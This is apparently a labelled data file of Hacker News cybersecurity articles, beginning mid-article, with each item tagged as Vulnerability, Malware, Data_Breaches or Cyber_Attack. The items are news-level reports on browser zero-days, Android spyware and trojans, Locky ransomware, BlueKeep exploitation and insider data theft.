Details about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.
According to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. ""By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,"" the report stated.
As is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.
""Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,"" Chrome Technical Program Manager Prudhvikumar Bommana noted in a blog post.
With this update, Google has fixed three zero-day flaws in Chrome since the start of the year.
Earlier this month, the company issued a fix for an ""object lifecycle issue in audio"" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.
Chrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.
",Vulnerability
Java based cross platform malware found in wild,https://thehackernews.com/2013/08/Cross-platform-malware-java-hacking-tool.html,"Other than Windows, Now other platforms are becoming more popular every day and attracting bad guys who are starting to create malicious code for other systems.
Java applications can run on multiple platforms with ease, thus no surprise that malicious code written in Java that is designed to target more than one operating system are becoming increasingly common.
Researchers at McAfee Labs spotted another sample of Java based trojan dubbed as JV/BackDoor-FAZY that opens a back door for an attacker to execute commands and acts as a bot after infection.
According to researcher, The key to decrypt the config file was encrypted with Base 64, Triple-DES algorithm and Hex. Decrypting the file provides information about the backdoor connection, includes IP address, port number, operating system, mutex information, and password for the connection.
""On execution, the JAR file opens the backdoor connection to the IP address and the port mentioned in the plain config file. Once the backdoor connection is made, the compromised user environment will act as the server and the attacker will be the client. The attacker can now take control of the victim's system and can execute any commands."" blog post said.
Such malicious file can be bundled with a legitimate file and can be dropped and executed in the background, without the user consent and can copy itself to all available drives on the system and allows hackers to record the user screen, keystrokes, access to command prompt, downloading & execute other binary files or using the system to DDoS using HTTP POST and GET requests.
Multi-platform malware is not entirely new, but with the increasing popularity of Apple products and systems running Linux, there is an incentive for malware authors to save time and resources by developing strains that are capable of infecting multiple operating systems.
",Malware
New Cold Boot Attack Unlocks Disk Encryption On Nearly All Modern PCs,https://thehackernews.com/2018/09/cold-boot-attack-encryption.html,"Security researchers have revealed a new attack to steal passwords, encryption keys and other sensitive information stored on most modern computers, even those with full disk encryption.
The attack is a new variation of a traditional Cold Boot Attack, which is around since 2008 and lets attackers steal information that briefly remains in the memory (RAM) after the computer is shut down.
However, to make the cold boot attacks less effective, most modern computers come bundled with a safeguard, created by the Trusted Computing Group (TCG), that overwrites the contents of the RAM when the power on the device is restored, preventing the data from being read.
Now, researchers from Finnish cyber-security firm F-Secure figured out a new way to disable this overwrite security measure by physically manipulating the computer's firmware, potentially allowing attackers to recover sensitive data stored on the computer after a cold reboot in a matter of few minutes.
""Cold boot attacks are a known method of obtaining encryption keys from devices. But the reality is that attackers can get their hands on all kinds of information using these attacks. Passwords, credentials to corporate networks, and any data stored on the machine are at risk,"" the security firm warns in a blog post published today.
Video Demonstration of the New Cold Boot Attack
Using a simple tool, researchers were able to rewrite the non-volatile memory chip that contains the memory overwrite settings, disable it, and enable booting from external devices. You can also watch the video demonstration performing the attack below.
Like the traditional cold boot attack, the new attack also requires physical access to the target device as well as right tools to recover remaining data in the computer's memory.
""It's not exactly easy to do, but it is not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,"" says F-Secure principal security consultant Olle Segerdahl, one the two researchers.
""It's not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.""
How Microsoft Windows and Apple Users Can Prevent Cold Boot Attacks
According to Olle and his colleague Pasi Saarinen, their new attack technique is believed to be effective against nearly all modern computers and even Apple Macs and can't be patched easily and quickly.
The two researchers, who will present their findings today at a security conference, say they have already shared their findings with Microsoft, Intel, and Apple, and helped them explore possible mitigation strategies.
Microsoft updated its guidance on Bitlocker countermeasures in response to the F-Secure's findings, while Apple said that its Mac devices equipped with an Apple T2 Chip contain security measures designed to protect its users against this attack.
But for Mac computers without the latest T2 chip, Apple recommended users to set a firmware password in order to help harden the security of their computers.
Intel has yet to comment on the matter.
The duo says there's no reliable way to ""prevent or block the cold boot attack once an attacker with the right know-how gets their hands on a laptop,"" but suggest the companies can configure their devices so that attackers using cold boot attacks won't find anything fruitful to steal.
Meanwhile, the duo recommends IT departments to configure all company computers to either shut down or hibernate (not enter sleep mode) and require users to enter their BitLocker PIN whenever they power up or restore their PCs.
Attackers could still perform a successful cold boot attack against computers configured like this, but since the encryption keys are not stored in the memory when a machine hibernates or shuts down, there will be no valuable information for an attacker to steal.
",Vulnerability
iBanking Android Malware targeting Facebook Users with Web Injection techniques,https://thehackernews.com/2014/04/ibanking-android-malware-targeting.html,"iBanking is nothing but a mobile banking Trojan app which impersonates itself as a so-called 'Security App' for Android devices and distributed through HTML injection attacks on banking sites, in order to deceive its victims.
Recently, its source code has been leaked online through an underground forum that gave the opportunities to a larger number of cyber criminals to launch attacks using this kind of ready-made mobile malware.
The malicious iBanking app installed on victims' phone has capabilities to spy on user's communications. The bot allows an attacker to spoof SMS, redirect calls to any pre-defined phone number, capture audio using the device's microphone and steal other confidential data like call history log and the phone book contacts.
According to new report from ESET security researchers, now this iBanking Trojan (Android/Spy.Agent.AF) is targeting Facebook users by tricking them to download a malware application.
The malware uses JavaScript web injection method to create a fake Facebook Verification page for Facebook users, as shown:
Injected fake verification page prompts users to enter their mobile number in order to verify the Facebook account authenticity, and then shows the following page if he indicates that his mobile is running Android.
Next fake page asks victim to download an Android app from the shown URL or using QR code method, if SMS somehow fails to reach the user's phone. Once downloaded and installed, the malware connects to its command-and-control server that allows attackers to issue commands to each infected device.
Facebook also has two-factor authentication features for quite a long time, but this is the very first time when Facebook users are targeted by iBanking Trojan. The reason may be an increasing number of people using it.
Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, but in order to bypass two factor authentication, cyber criminals have started to create various mobile malware like iBanking to solve their purpose.
iBanking Trojan can be used in conjunction with any malware in order to inject code into a webpage and is generally used to redirect incoming SMS messages to bypass two-factor authentication.
It is always important to treat third-party apps with a healthy dose of suspicion and skepticism as cybercriminals are always out there to hijack your every device.
Don't just download any app from any source you happen to encounter and before installing a new app, just check out the reputation of both the app and the publisher. In order to prevent direct installations, go to your Android device's Applications Settings menu and disable the ""unknown sources"" option for installing apps.
Stay Safe!
",Malware
WARNING — Malware Found in CamScanner Android App With 100+ Million Users,https://thehackernews.com/2019/08/android-camscanner-malware.html,"Beware! Attackers can remotely hijack your Android device and steal data stored on it, if you are using free version of CamScanner, a highly-popular Phone PDF creator app with more than 100 million downloads on Google Play Store.
So, to be safe, just uninstall the CamScanner app from your Android device now, as Google has already removed the app from its official Play Store.
Unfortunately, CamScanner has recently gone rogue as researchers found a hidden Trojan Dropper module within the app that could allow remote attackers to secretly download and install malicious program on users' Android devices without their knowledge.
However, the malicious module doesn't actually reside in the code of CamScanner Android app itself; instead, it is part of a 3rd-party advertising library that recently was introduced in the PDF creator app.
Discovered by Kaspersky security researchers, the issue came to light after many CamScanner users spotted suspicious behavior and posted negative reviews on Google Play Store over the past few months, indicating the presence of an unwanted feature.
""It can be assumed that the reason why this malware was added was the app developers' partnership with an unscrupulous advertiser,"" the researchers said.
The analysis of the malicious Trojan Dropper module revealed that the same component was also previously observed in some apps pre-installed on Chinese smartphones.
""The module extracts and runs another malicious module from an encrypted file included in the app's resources,"" researchers warned.
""As a result, the owners of the module can use an infected device to their benefit in any way they see fit, from showing the victim intrusive advertising to stealing money from their mobile account by charging paid subscriptions.""
Kaspersky researchers reported its findings to Google, who promptly removed the CamScanner app from its Play Store, but they say ""it looks like app developers got rid of the malicious code with the latest update of CamScanner.""
Despite this, the researchers advised users to just keep in mind ""that versions of the app vary for different devices, and some of them may still contain malicious code.""
It should be noted that since the paid version of the CamScanner app doesn't include the 3rd-party advertising library and thus the malicious module, it is not affected and is still available on the Google Play Store.
Although Google has stepped up its efforts to remove potentially harmful apps from Play Store in the last few years and added more stringent malware checks for new apps, legitimate apps can go rogue overnight to target millions of its users.
""What we can learn from this story is that any app — even one from an official store, even one with a good reputation, and even one with millions of positive reviews and a big, loyal user base —can turn into malware overnight,"" the researchers concluded.
Therefore, you are strongly advised to always keep a good antivirus app on your Android device that can detect and block such malicious activities before they can infect your device.
In addition, always look at the app reviews left by other users who have downloaded the app, and also verify app permissions before installing any app and grant only those permissions that are relevant for the app's purpose.
For more technical detail about the Trojan Dropper malware found in CamScanner and a full list of its indicators of compromise (IOCs) including MD5 hashes and its command and control server domains, you can head on to Kaspersky's report.
",Malware
20 Million Credit Cards stolen in South Korea; 40% Population affected by the Data Leak,https://thehackernews.com/2014/01/bank-data-and-credit-card-details-of-20.html,"Since all threats to data security and privacy often come from outside, but internal threats are comparatively more dangerous and a difficult new dimension to the data loss prevention challenge i.e. Data Breach. The ""Insider threats"" have the potential to cause greater financial losses than attacks that originate outside the company.
This is what happened recently with three credit card firms in South Korea, where the financial and personal data belonging to users of at least 20 million, in a country of 50 million, was stolen by an employee, who worked as a temporary consultant at Korean Credit Bureau (KCB).
""Confidential data of customers ranging from the minister-level officials to celebrities, including their phone numbers, addresses, credit card numbers, and even some banking records, have been leaked from Kookmin Bank, Shinhan Bank and several other commercial banks"",
The stolen data includes the bank account numbers, customers' names, social security numbers, phone numbers, credit card numbers and expiration dates, according to the estimate by the Financial Supervisory Service (FSS).
The arrested employee behind the theft, later sold the data to phone marketing companies, whose managers were also arrested earlier this month.
""The credit card firms will cover any financial losses caused to their customers due to the latest accident,"" the FSS said and assured that the Regulators have launched investigations into security measures at the affected firms.
""Their parent firms seem to be taking a step back (from the issue) and not showing any responsible attitude, We will hold them fully responsible for the data leak if their sharing of client data among affiliates and internal control turn out to be the cause.""
Now this is not the first time when a company is facing data breach because of Insider Threat, last month an employee of Citibank Korea was arrested for stealing the personal data of 34,000 customers. In 2012, two South Korean hackers were arrested for data from 8.7 million customers in the nation's second-biggest mobile operator.
",Data_Breaches
First Cyber Attack 'Mass Exploiting' BlueKeep RDP Flaw Spotted in the Wild,https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html,"Cybersecurity researchers have spotted a new cyberattack that is believed to be the very first but an amateur attempt to weaponize the infamous BlueKeep RDP vulnerability in the wild to mass compromise vulnerable systems for cryptocurrency mining.
In May this year, Microsoft released a patch for a highly-critical remote code execution flaw, dubbed BlueKeep, in its Windows Remote Desktop Services that could be exploited remotely to take full control over vulnerable systems just by sending specially crafted requests over RDP.
BlueKeep, tracked as CVE-2019-0708, is a wormable vulnerability because it can be weaponized by potential malware to propagate itself from one vulnerable computer to another automatically without requiring victims' interaction.
BlueKeep has been considered to be such a serious threat that since its discovery, Microsoft and even government agencies [NSA and GCHQ] had continuously been encouraging Windows users and admins to apply security patches before hackers gain hold onto their systems.
Even many security firms and individual cybersecurity researchers who successfully developed a fully working exploit for BlueKeep pledged not to release it to the public for a greater good—especially because nearly 1 million systems were found vulnerable even a month after patches were released.
This is why amateur hackers took almost six months to come up with a BlueKeep exploit that is still unreliable and doesn't even have a wormable component.
BlueKeep Exploit Spreads Cryptocurrency Malware
The BlueKeep exploitation in the wild was first speculated by Kevin Beaumont on Saturday when his multiple EternalPot RDP honeypot systems got crashed and rebooted suddenly.
Marcus Hutchins, the researcher who helped stop the WannaCry ransomware outbreak in 2017, then analysed the crash dumps shared by Beaumont and confirmed ""BlueKeep artifacts in memory and shellcode to drop a Monero Miner.""
In a blog post published today, Hutchins said, ""Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!""
The exploit contains encoded PowerShell commands as the initial payload, which then eventually downloads the final malicious executable binary from a remote attacker-controlled server and executes it on the targeted systems.
According to Google's VirusTotal malware scanning service, the malicious binary is cryptocurrency malware that mines Monero (XMR) using the computing power of infected systems to generate revenue for attackers.
But It's Not Wormable Attack!
Hutchins also confirmed that the malware spread by this BlueKeep exploit doesn't contain any self-spreading capabilities to jump unassisted from one computer to another.
Instead, it appears that the unknown attackers are first scanning the Internet to find vulnerable systems and then exploiting them.
In other words, without a wormable component, the attackers would be able to only compromise vulnerable systems that are directly connected to the Internet, but not those that are internally-connected and reachable from them.
Though sophisticated hackers might have already been exploiting the BlueKeep flaw to stealthy compromise targeted victims, fortunately, the flaw has not yet been exploited at a larger scale, like WannaCry or NotPetya wormable attacks, as speculated initially.
However, at the time of writing, it's unclear how many BlueKeep vulnerable Windows systems have been compromised in the latest cyberattacks to deploy the Monero miner in the wild.
To protect yourself? Let me try this again—Go and fix the goddamn vulnerability if you are or your organisation is still using BlueKeep vulnerable Windows systems.
If fixing the vulnerability in your organisation is not possible anytime sooner, then you can take these mitigations:
Disable RDP services, if not required.
Block port 3389 using a firewall or make it accessible only over a private VPN.
Enable Network Level Authentication (NLA) – this is partial mitigation to prevent any unauthenticated attacker from exploiting this Wormable flaw.
",Cyber_Attack
The Bash Vulnerability: How to Protect your Environment,https://thehackernews.com/2014/10/the-bash-vulnerability-how-to-protect_23.html,"A recently discovered hole in the security of the Bourne-Again Shell (bash) has the majority of Unix/Linux (including OS X) admins sweating bullets. You should be, too--attackers have already developed exploits to unleash on unpatched web servers, network services and daemons that use shell scripts with environment variables (this can include network equipment, industrial devices, etc.)
Jaime Blasco, AlienVault Labs Director, gives a good explanation of the exploit in this blog post. And, the video below gives you a quick overview of how AlienVault Unified Security Management (USM) can detect malicious traffic on your network trying to locate and exploit this vulnerability.
Basically, this vulnerability allows an attacker to execute shell commands on a server due to an issue in how bash interprets environment variables (such as ""cookie"", ""host"", ""referrer""). Exploiting this allows an attacker to run shell commands directly. Once they have access to run shell commands, they own the server.
What can I do?
If you're already sanitizing inputs across your web applications to protect against SQL injection and cross-site scripting, you're on the right track. This will give you at least a basic defense.
While CGI is still around on most sites, it is usually restricted to little bits of code that have been around for years. These bits of code have probably not updated under the rule-of-thumb ""If it ain't broke, don't fix it.""
Well – guess what? It's broke. Fix it. It's time to find an alternative. But, in the mean time, it's a good idea to disable any CGI that calls on the shell.
Some have recommended using something other than bash in your applications (Dash, Fish, Zsh, Csh, etc) but be sure to put some thought and careful planning into that instead of a knee-jerk 'rip and replace'. Certain shells might work differently or even be missing some of the bash functionality that your applications rely on, rendering them inoperable.
The real fix is going to be patching of bash itself, either from the developers of the distribution you use, or, (if you're savvy) via your own compiled code. Until then, the steps mentioned above are good first steps to defending yourself.
How can AlienVault help?
AlienVault Unified Security Management (USM) provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, giving you everything you need to detect vulnerabilities like Bash, and attempted exploits.
With AlienVault USM you can:
Discover and inventory your network assets automatically
Scan for thousands of vulnerabilities, including Bash
Detect attacks and activity with known malicious hosts
Prioritize risks with correlated vulnerability and threat data
Benefit from threat intelligence updates developed by security experts at AlienVault Labs
Within 24 hours of the discovery of the Bash vulnerability, the AlienVault Labs team pushed updated network signatures and correlation directives to the USM platform, enabling users to detect the vulnerability in their environment, and detect attackers attempting to exploit it.
Learn more about AlienVault USM:
Download a free 30-day trial
Watch a demo on-demand
Play with USM in our product sandbox (no download required)
Attend our webcast ""The Bash Vulnerability: Practical Steps to Protect your Environment""
",Vulnerability
Apple's Developer Center Offline for 32 Hours; Compromised ?,https://thehackernews.com/2013/07/apples-developer-center-offline-for-32.html,"It's been over a day now since Apple's online Dev Center went offline, and latest message can be seen in the screenshot, which explains that the current maintenance has took a lot longer than they expected.
""We apologize that maintenance is taking longer than expected. If your program membership was set to expire during this period, it has been extended and your app will remain on the App Store. If you have any other concerns about your account, please contact us. Thank you for your patience."" message said.
Since that time, developers have been unable to access the site and cannot visit the forums or download Mac or iOS SDKs, the iOS 7 beta, or the Mavericks beta.
It was first seemed like Apple having some backend issues but according to tweets from many developers, they have received a message from Apple that an attempt was made to reset their user ID's password. Such notices pointing that Apple's Developer Center website may have been compromised. But if it is a security issue, there still remain unanswered questions over what happened.
This is not a problem if you have no need to visit your Apple developer account, but for those of you that want to add another iPhone or iOS device to your account, it is a real problem. Possibly that iOS 7 beta 4 download will arrive right around the time of the Dev Center return.
Update (Monday) :
Apple has published a statement claiming that an intruder attempted to steal the details of registered developers from the company's developer website.
A UK based security researcher, Ibrahim Balic claims that he reported 13 Vulnerabilities in Apple system, highlighting a hole that could left data from the Developer Center exposed. For proof of concept, he demonstrated the hack on his own 73 employees while reporting to Apple security team. Though he admits that he was able to hack more than 100,000 users, but he did not hack the system for malicious purposes.
Security researcher is not happy with Apple's Statement, that cited an attempted security breach as the reason for the developer site outage.
",Vulnerability
Malicious Gaming App Infects More than 1 Million Android Users,https://thehackernews.com/2015/07/android-malware-game.html,"It's not at all surprising that the Google Play Store is surrounded by a number of malicious applications that may gain users' attention to fall victim for one, but this time it might be even worse than you thought.
Threat researchers from security firm ESET have discovered a malicious Facebook-Credentials-Stealing Trojan masquerading as an Android game that has been downloaded by more than a Million Android users.
Malicious Android Apps downloaded 50,000-1,000,000 times
The Android game, dubbed ""Cowboy Adventure,"" and another malicious game, dubbed ""Jump Chess"" – downloaded up to 50,000 times, have since been removed from Google Play Store.
However, before taking them off from the app store, the creepy game apps may have compromised an unknown number of victims' Facebook credentials.
Both the games were created by the same software developer, Tinker Studio and both were used to gather social media credentials from unsuspecting users.
How Cowboy Adventure victimizes Android users?
Once installed, Cowboy Adventure produced a fake Facebook login window that prompted users to enter their Facebook usernames along with their passwords. A practice known as OAuth in which a 3rd party asks your Facebook login.
However, if users provide their credentials to Cowboy Adventure app, the malicious code within the game app allegedly sent their credentials to the attacker's server.
Therefore, If you have downloaded Cowboy Adventure or Jump Chess, you should immediately change not alone your Facebook password, but any service that uses the same combination of username and password as your Facebook account.
ESET senior security researcher Robert Lipovsky believes that the app malicious behavior is not just a careless mistake of the game developer, but the developer is actually a criminal minded.
Take Away
A few basic tips that you should always keep in your mind are:
Always download apps from official sources, such as Google Play Store or Apple's App Store.
Read reviews from other users before downloading an app (Many users complained about ""Cowboy Adventure"" that the game locked them out of Facebook accounts).
Always use two-factor authentication on services that makes it harder for hackers to access your accounts with just your password.
Always keep a malware scanning software from trusted vendors like Avast, AVG, ESET, Kaspersky and Bitdefender, on your smartphone.
",Malware
Russian Arrested After Offering $1 Million to U.S. Company Employee for Planting Malware,https://thehackernews.com/2020/08/russian-extortion-malware.html,"Hackers always find a way in, even if there's no software vulnerability to exploit.
The FBI has arrested a Russian national who recently traveled to the United States and offered $1 million in bribe to an employee of a targeted company for his help in installing malware into the company's computer network manually.
Egor Igorevich Kriuchkov, 27-year-old, entered the United States as a tourist and was arrested in Los Angeles after meeting with the unnamed employee of an undisclosed Nevada-based company numerous times, between August 1 to August 21, to discuss the conspiracy.
""On or about July 16, EGOR IGOREVICH KRIUCHKOV used his WhatsApp account to contact the employee of victim company and arranged to visit in person in the District of Nevada,"" the court documents say.
""On or about July 28, EGOR IGOREVICH KRIUCHKOV entered the United States using his Russian Passport and a B1/B2 tourist visa.""
Kriuchkov also asked the employee to participate in developing tailored malware by sharing information about the company's infrastructure.
According to court documents released by the US Justice Department, the malicious software Kriuchkov asked to install aims to extract data from the company's network, allowing attackers to threaten it later to make the information public unless it pays a ransom.
Kriuchkov and his co-conspirators in Russia promised the employee to pay $1 million in Bitcoins after successfully planting the said malware and offered to launch a DDoS attack on the company's network to divert attention from the malware.
""If CHS1 [employee] agreed to this arrangement, the group would provide the malware to CHS1 [employee] in either a thumb drive to be inserted into a computer's USB drive or an email with an attachment containing malware.""
""The unidentified co-conspirator discussed various means by which to pay the employee, including payments using cryptocurrency, a guarantor security deposit, or cash.""
""After being contacted by the FBI, Kriuchkov drove overnight from Reno, Nevada, to Los Angeles. Kriuchkov asked an acquaintance to purchase an airline ticket for him in an attempt to fly out of the country,"" the United States agencies say.
After getting arrested by the FBI, who was conducting physical surveillance of Kriuchkov and his meetings, he listed prior companies the gang had targeted and also revealed that each of these targeted companies had a person working at those companies who installed malware on behalf of the gang.
To be noted, it's quite possible that a few high-profile ransomware and data breach attacks might have been executing in the same way by conspiring with the insiders.
Kriuchkov has been charged with one count of conspiracy to cause damage to a protected computer intentionally.
",Cyber_Attack
Microsoft Edge Bug Could've Let Hackers Steal Your Secrets for Any Site,https://thehackernews.com/2021/06/microsoft-edge-bug-couldve-let-hackers.html,"Microsoft last week rolled out updates for the Edge browser with fixes for two security issues, one of which concerns a security bypass vulnerability that could be exploited to inject and execute arbitrary code in the context of any website.
Tracked as CVE-2021-34506 (CVSS score: 5.4), the weakness stems from a universal cross-site scripting (UXSS) issue that's triggered when automatically translating web pages using the browser's built-in feature via Microsoft Translator.
Credited for discovering and reporting CVE-2021-34506 are Ignacio Laurence as well as Vansh Devgan and Shivam Kumar Singh with CyberXplore Private Limited.
""Unlike the common XSS attacks, UXSS is a type of attack that exploits client-side vulnerabilities in the browser or browser extensions in order to generate an XSS condition, and execute malicious code,"" CyberXplore researchers said in a write-up shared with The Hacker News.
""When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled.""
Specifically, the researchers found that the translation feature had a piece of vulnerable code that failed to sanitize input, thus allowing an attacker to potentially insert malicious JavaScript code anywhere in the webpage that's then subsequently executed when the user clicks the prompt on the address bar to translate the page.
As a proof-of-concept (PoC) exploit, the researchers demonstrated it was possible to trigger the attack simply by adding a comment to a YouTube video, which is written in a language other than English, along with an XSS payload.
In a similar vein, a friend request from a Facebook profile containing other language content and the XSS payload was found to execute the code as soon as the recipient of the request checked out the user's profile.
Following responsible disclosure on June 3, Microsoft fixed the issue on June 24, in addition to awarding the researchers $20,000 as part of its bug bounty program.
The latest update (version 91.0.864.59) to the Chromium-based browser can be downloaded by visiting Settings and more > About Microsoft Edge (edge://settings/help).
",Vulnerability
How Just Opening an MS Word Doc Can Hijack Every File On Your System,https://thehackernews.com/2016/02/locky-ransomware-decrypt.html,"If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it.
Doing so could cripple your system and could lead to a catastrophic destruction.
Hackers are believed to be carrying out social engineering hoaxes by adopting eye-catching subjects in the spam emails and compromised websites to lure the victims into installing a deadly ransomware, dubbed ""Locky,"" into their systems.
So if you find .locky extension files on your network shares, Congratulations! You are infected and left with just two solutions: Rebuild your PC from scratch or Pay the ransom.
Locky ransomware is spreading at the rate of 4000 new infections per hour, which means approximately 100,000 new infections per day.
Microsoft MACROS are Back
It is hard to digest the fact that, in this 2016, even a single MS Word document could compromise your system by enabling 'Macros.'
This is where the point to appreciate hacker's sheer brilliance of tactics.
Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an Invoice email attachment (Word File that embeds vicious macro functions).
The concept of macros dates back to 1990s. You must be familiar with this message: ""Warning: This document contains macros.""
Now macros are back, as cyber criminals discover a new way to get internet users to open Microsoft Office documents, especially Word files that allow macros to run automatically.
How Does Locky Work?
Once a user opens a malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file and found the content scrambled and a popup that states ""enable macros"".
Here comes the bad part:
Once the victim enables the macro (malicious), he/she would download an executable from a remote server and run it.
This executable is nothing but the Locky Ransomware that, when started, will begin to encrypt all the files on your computer as well as network.
Locky ransomware affects nearly all file formats and encrypts all the files and replace the filename with .locky extension.
Once encrypted, the ransomware malware displays a message that instructs infected victims to download TOR and visit the attacker's website for further instructions and payments.
Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.
One of the interesting note on Locky is that it is being translated into many languages, which heighten its attack beyond English boundaries to maximize the digital casualties.
Locky Encrypts Even Your Network-Based Backup Files
The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep you sensitive and important files in a third party storage as a backup plan in order to evade future-ransomware infections.
A researcher named Kevin Beaumont initially discovered the existence of Locky encrypted virus.
To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading out rapidly in the wild.
""I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected,"" Kevin said in a blog post.
One hour of infection Statistics:
Among the highly impacted countries include Germany, Netherlands, United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.
",Malware
17-Year-Old Found Bugs in WhatsApp Web and Mobile App,https://thehackernews.com/2015/01/whatsapp-web-mobile-app.html,"Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version.
An independent 17-year-old security researcher Indrajeet Bhuyan reported two security holes in the WhatsApp web client that in some way exposes its users' privacy. Bhuyan called the first hole, WhatsApp photo privacy bug and the other WhatsApp Web Photo Sync Bug.
Bhuyan is the same security researcher who reported us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations.
Whatsapp Photo Privacy Bug
According to him, the new version of WhatsApp Web allows us to view a user's profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to ""Contacts Only,"" the profile picture can be viewed by out of contacts people as well.
Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But, this is not in the case of WhatsApp Web. You can watch how this works in the video demonstration below:
WhatsApp Web Photo Sync Bug
The second security hole points out the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of WhatsApp application, the photo appears blurred and can't be viewed.
However, the same photo, which has already been deleted by the user from mobile WhatsApp version, can be accessible by Whatsapp Web as the photo does not get deleted from its web client, revealing the fact that mobile and web clients of the service are not synced properly. You can also watch the video demonstration on this as well:
This is no surprise, as WhatsApp Web introduced just a couple of days before and these small security and implementation flaws could be expected at this time, as well as some other bugs could also be revealed in the near future.
However, the company will surely fix the issues and will definitely make its users' messaging experience secure. As partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on Android platform, stepping a way forward for the online privacy of its users around the world.
",Vulnerability
Powerful FinSpy Spyware Found Targeting iOS and Android Users in Myanmar,https://thehackernews.com/2019/07/finspy-spyware-android-ios.html,"One of the most powerful, infamous, and advanced piece of government-grade commercial surveillance spyware dubbed FinSpy—also known as FinFisher—has been discovered in the wild targeting users in Myanmar.
Created by German company Gamma International, FinSpy is spying software that can target various mobile platforms including iOS and Android, we well as desktop operating systems.
Gamma Group reportedly sells its controversial FinSpy espionage tool exclusively to government agencies across the world, but also gained notoriety for targeting human rights activists in many countries.
The FinSpy implant is capable of stealing an extensive amount of personal information from targeted mobile devices, such as SMS/MMS messages, phone call recordings, emails, contacts, pictures, files, and GPS location data.
In its latest report published today, Kaspersky researchers revealed a cyber-espionage campaign that involves targeting Myanmar users with the latest versions of FinSpy implants for iOS and Android.
Since some advanced functionalities require FinSpy to have root privileges on a targeted device, the implant doesn't work properly on iOS without jailbreaking, which can be achieved with physical access or remotely in combination with some zero-day vulnerabilities.
However, in the case of Android, researchers found that the implant has been using the DirtyCow exploit to automatically gain root privileges on an unrooted Android device, allowing attackers to successfully infect a device remotely.
According to the researchers, the new versions of FinSpy for both mobile operating systems are also capable of recording VoIP calls via external apps such as Skype, WeChat, Viber, LINE, as well as via secure messaging apps such as WhatsApp, Threema, Signal, and Telegram.
""The module .chext targets messenger applications and hooks their functions to exfiltrate almost all accessible data: message content, photos, geolocation, contacts, group names, and so on. The collected data is submitted to the local server deployed by the main module,"" the researchers say.
FinSpy also includes keylogging functionality and has also been designed to cover up the tracks of its activities on a targeted device.
""Since the leak in 2014, Gamma Group has recreated significant parts of its implants, extended supported functionality (for example, the list of supported instant messengers has been significantly expanded) and at the same time improved encryption and obfuscation (making it harder to analyze and detect implants), which made it possible to retain its position in the market,"" the researchers conclude.
While conducting their research, Kaspersky researchers detected the updated versions of the FinSpy implants used in the wild in almost 20 countries, but ""assuming the size of Gamma's customer base; it's likely that the real number of victims is much higher.""
Gamma is continuously working on the updates for the FinSpy malware, as researchers have found another version of the threat at the time of publishing their report, and they are currently investigating the sample.
",Malware
Multiple Vulnerabilities in Firefox for Android Leak Sensitive Information,https://thehackernews.com/2014/03/multiple-vulnerabilities-in-firefox-for.html,"The Android operating system has hardened its security with application Sandboxing features to ensure that no application can access sensitive information held by another without proper privileges.
Android applications communicate with each other through Intents and these intents can be abused by hackers to provide a channel for a malicious application to inject malicious data into a target, potentially vulnerable application.
Security Researchers at IBM have discovered multiple vulnerabilities in Firefox for Android platform that allow a malicious application to leak the sensitive information related to the user's profile.
Android's Firefox app stores the personal data at following location:
/data/data/org.mozilla.firefox/files/mozilla/.default.
Where the random name for user's profile is used to prevent unwanted access to this directory in case of Firefox exploitation.
Researchers developed an exploit to brute-force the Firefox profile directory name in a practical amount of time CVE-2014-1516) and successfully bypassed Android's sandbox to obtain the sensitive data reside in that directory, including users' cookies, browsing history and cache information.
For successful exploitation, an attacker can create a specially crafted HTML file, that will force Firefox to load the files including inside the user profile directory using an Intent.
The JavaScript code in the HTML file will download any file under the user profile directory by creating an iframe, using the vulnerability dubbed as CVE-2014-1515 (explained below).
Downloaded files with the exploit code will be saved automatically to the SD card at location /mnt/sdcard/Download, that can be read by the attacker using any malicious Android app.
REPORTED VULNERABITIES
1.) Profile Directory Name Weak Randomization (CVE-2014-1516) - The Attacker who knows the seed of the Pseudo-Random Number Generator (PRNG) can easily predict its output and eventually the generated Firefox Profile name.
2.) Profile Directory Name Leaks to Android System Log (CVE-2014-1484) - Android operating system writes the randomly generated Firefox user's Profile Directory Name in the Android System Log (logcat) at various locations, that can be used to steal private information.
